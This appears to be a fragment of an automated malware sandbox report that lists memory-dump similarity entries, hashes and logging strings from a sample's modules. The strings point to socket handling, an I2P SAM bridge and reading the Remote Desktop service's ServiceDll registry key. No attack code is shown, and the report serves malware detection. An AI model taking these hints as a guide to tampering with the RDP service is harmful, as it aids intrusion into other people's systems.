                    • Instruction Fuzzy Hash: CAF054A1E0C90399E61957ADEC470B55751AF10BDCF94A532DB1CA61F6FE1CA94E8300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                    • Instruction ID: eef99c998f22e0f981c0513f8896fee90ce4fddaa909c1dda28792a24753a156
                    • Opcode Fuzzy Hash: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                    • Instruction Fuzzy Hash: 96F05454E4D607E4ED21A7EEAC904B12250AF077C0F8455B2CF0D56365FE1CAB46C310
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                    • Instruction ID: fd222b74897f9dbe6fd12d064a1908f727ff3ae57ed5dd56cba605782f16bda5
                    • Opcode Fuzzy Hash: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                    • Instruction Fuzzy Hash: 06F08251E096C751FD569F9EE8805F022519F05BD4F498531CF0C57756FD1CA987B310
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastclosesocketfflushfwrite
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                    • API String ID: 152032778-2221966578
                    • Opcode ID: 8599731fb1bba70c80c6a87e0d95c1ba84472dea675db9bdef4eccd0eba7448a
                    • Instruction ID: 63d541d7c2bb6d7719950bd33f6727107b1dd9e040c96960f3e5754402777080
                    • Opcode Fuzzy Hash: 8599731fb1bba70c80c6a87e0d95c1ba84472dea675db9bdef4eccd0eba7448a
                    • Instruction Fuzzy Hash: C4F05890E0D647C1FA18ABFDE8410B82351AF94BF8F148335D73E562E3AE2CA586C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastclosesocketfflushfwrite
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                    • API String ID: 152032778-2221966578
                    • Opcode ID: 12861671799783d57c0e45ebdd2486de4913a4295b0a9ddc1e35ca3c9b0b37bb
                    • Instruction ID: b7848574a132c4adbfd870015e5be3630530f9be8714a23d6641a4abfaaf0a56
                    • Opcode Fuzzy Hash: 12861671799783d57c0e45ebdd2486de4913a4295b0a9ddc1e35ca3c9b0b37bb
                    • Instruction Fuzzy Hash: E6F09090E0890384FA1857EEAC171B417109F10BFCF547331DB3EA51E6AD1CA9498300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Openstrcmpstrlen
                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                    • API String ID: 679246061-1413152910
                    • Opcode ID: 63975a93190b79f59677f2cf894f3a731aba901ec3ab26a81d23eb9d20377d47
                    • Instruction ID: 9441c1d6a57794b99c6655ae9db667440c4c3639640f577e8d18a6079f9be22e
                    • Opcode Fuzzy Hash: 63975a93190b79f59677f2cf894f3a731aba901ec3ab26a81d23eb9d20377d47
                    • Instruction Fuzzy Hash: CC219D71A1CAC751EB208F18A8C03FA6355EF60394F850072E79D46196EF3CD649F650
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                    • Instruction ID: 5c49cc86d297a1da9224adbb52b373ee3a9d1ae7eee50ab03f3966d6b1a772b9
                    • Opcode Fuzzy Hash: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                    • Instruction Fuzzy Hash: 84F09661F0D64396F75057ADA8101B97360AB947D4F144131EF2D87BA4EE7CE9468700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 080e8fde5a2ba98204fe8d5300717fb1248164f312ba23c459eec33983392385
                    • Instruction ID: 8410c7a29659df75c6854531af58257741b97c659d171a7f0c8538036e5edefd
                    • Opcode Fuzzy Hash: 080e8fde5a2ba98204fe8d5300717fb1248164f312ba23c459eec33983392385
                    • Instruction Fuzzy Hash: 23F09661F0D54282F7505BEDF8005B96360ABC47D8F108235EE1D837A5DE7CD946C701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 1289b7a90d17fec904992b7589ad629829b1e3bc695305fe6ce7cbd808189d16
                    • Instruction ID: 3f2760fe8baa884364ab08d6b84d732b706c39ab5bbb6225552d4bed44006d37
                    • Opcode Fuzzy Hash: 1289b7a90d17fec904992b7589ad629829b1e3bc695305fe6ce7cbd808189d16
                    • Instruction Fuzzy Hash: 5BF0C2B6E0828246F7104F6DA8001B55660EB957D4F218231EE1D933A4DE3CE846E700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 2ea57274a692c49723bcaec0cb70b630c7dd65c16a70518f7afc343e942745d1
                    • Instruction ID: 8d3f1f5e101115e1872dc9f5b116f1c7d477e59edd42cf38a882379375115950
                    • Opcode Fuzzy Hash: 2ea57274a692c49723bcaec0cb70b630c7dd65c16a70518f7afc343e942745d1
                    • Instruction Fuzzy Hash: 18F09CA1F1C50246F31457ADB8022B55760EF847DCF50A131DF1D977A5DD3CD94A8700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: a429915bc11f3c506707949fc448ac0a6534b50bb89eadfb2e2ad2377f1bab6d
                    • Instruction ID: 1f8baa25038b56a6bb9b9ca0d1ed39586cf5db3455218b363a4475bb9a793eed
                    • Opcode Fuzzy Hash: a429915bc11f3c506707949fc448ac0a6534b50bb89eadfb2e2ad2377f1bab6d
                    • Instruction Fuzzy Hash: 93F06871E0C5079AF76157DDAC4017A6150EB967D4F144172EF1D837B4DE3CDA4A8701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 55c4fc8c7edf6649744f78dd5b51b38eff451531802172770dc8402a3ff2acae
                    • Instruction ID: b56c794e7f13711f668ddc68cf9206314b4cc8595b9d85b383e1ecc3752187d6
                    • Opcode Fuzzy Hash: 55c4fc8c7edf6649744f78dd5b51b38eff451531802172770dc8402a3ff2acae
                    • Instruction Fuzzy Hash: 5FF02B61F0C18256F3104F2DA8401B96660AF947E4F118331EE2E933E5DE3CE847B701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                    • Instruction ID: f9b76121b091e8bf4ddbd983e265edd573ea8f91927c2e3b0d11004730f14cfc
                    • Opcode Fuzzy Hash: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                    • Instruction Fuzzy Hash: 84F09661A0915296F7105F9DF8005A67760BB947D4F004231EF5D83BD4DF7CE545CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                    • Instruction ID: f8c01f93cc01feef4ef4e5cdb77bf74c3f573cb8a8c31f01d5d49b07241c880e
                    • Opcode Fuzzy Hash: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                    • Instruction Fuzzy Hash: CFF09661A0D15286F3105FADF8046B66760ABC47D4F048235EE6D83795DF7CD949CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 9528aeaa2bf256ae8ff0f18ad45033aaf4b3f86c5b89e20fedb4b7824a9256c1
                    • Instruction ID: 9675905ba5984215370ed3c1b91cc47f9745e2a17f9f0331bddb6e6b785d351b
                    • Opcode Fuzzy Hash: 9528aeaa2bf256ae8ff0f18ad45033aaf4b3f86c5b89e20fedb4b7824a9256c1
                    • Instruction Fuzzy Hash: C4F0F6A1B082824AF3505F1EB8001B66661AB883E4F108231EF5D837D4DF7CD589EB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                    • API String ID: 1729277954-536111009
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: memsetstrchr
                    • String ID: [D] (%s) -> %s$sam3_recv_rsp
                    • API String ID: 2564583029-4292814133
                    APIs
                    Strings
                    • ebus_dispatch, xrefs: 00007FF8BFB89ACA
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BFB89AD1
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    APIs
                    Strings
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B9151811
                    • ebus_dispatch, xrefs: 00007FF8B915180A
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    APIs
                    Strings
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BA501811
                    • ebus_dispatch, xrefs: 00007FF8BA50180A
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    APIs
                    Strings
                    • ebus_dispatch, xrefs: 00007FF8B918EEEA
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B918EEF1
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 50ddab41c2895b9b22a4d4635a104b7c26654cb7d37fed117f5fd98ba531e54b
                    • Instruction ID: 27658a0b7162c1c32d9d3ebe27860d9e8c90410d881095c918d585898f14ce0d
                    • Opcode Fuzzy Hash: 50ddab41c2895b9b22a4d4635a104b7c26654cb7d37fed117f5fd98ba531e54b
                    • Instruction Fuzzy Hash: C2F05427B2860341F562FA04BD51FB9D1511F417A8EC94535CD5E0B6D1AF3DE8E7C228
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: a09d7dc10f7d908e29253be61fa3c9b9b29b600e8bb5bbe80d6b09c93456bd94
                    • Instruction ID: 10d1004616132549f8f6512c7385b04f39329ef44a03364ddad20f1463ff0b50
                    • Opcode Fuzzy Hash: a09d7dc10f7d908e29253be61fa3c9b9b29b600e8bb5bbe80d6b09c93456bd94
                    • Instruction Fuzzy Hash: D9F05427B2860341F562FA04BD51FB9D1511F417A8EC94535CD5E0B6D1AF3DD8E7C228
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: de9fe99c49374705cdcb2ee0732af089202a8badd931d2ba541aeaae33d80ef1
                    • Instruction ID: 1982a6ec56c5d65f519c7a76dba285769735694fa4aeeea8f3f1923df98d5f5c
                    • Opcode Fuzzy Hash: de9fe99c49374705cdcb2ee0732af089202a8badd931d2ba541aeaae33d80ef1
                    • Instruction Fuzzy Hash: 86F0B423B2860341F562FA04BD50FB8D1111F407A8EC94531CD4E0B2D1AF3CD8E7C228
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
